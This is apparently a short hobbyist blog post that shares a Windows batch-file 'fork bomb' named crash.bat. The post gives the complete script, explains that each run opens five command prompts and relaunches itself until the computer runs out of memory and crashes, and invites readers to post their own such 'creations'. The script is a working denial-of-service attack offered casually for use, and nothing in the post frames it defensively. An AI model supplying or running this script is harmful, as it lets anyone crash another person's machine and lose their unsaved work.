These tasks can be run over and over and over without user intervention on many levels, a quick double click will run a batch file with the commands listed in the order which they were entered. I'm curious what other people can come up with, let me know what creations you've come up with in the comments below. Here is my last and final batch file I'll share that will crash a system, windows 8 may be protected from it somehow I'm not sure how though.
start
start
start
start
start crash.bat
Save as crash.bat. This'll open up 5 instances of command prompt and then run crash.bat again. Each command prompt will open up 5 instances of crash.bat, so on and so forth until the PC runs out of memory and crashes. Multiplying by 5 every step of the way.
Don't forget to hit that +1 button, share with friends and family, and let me know what you think in the comments below. And as always, be safe my goblins.
0 comments:
Post a Comment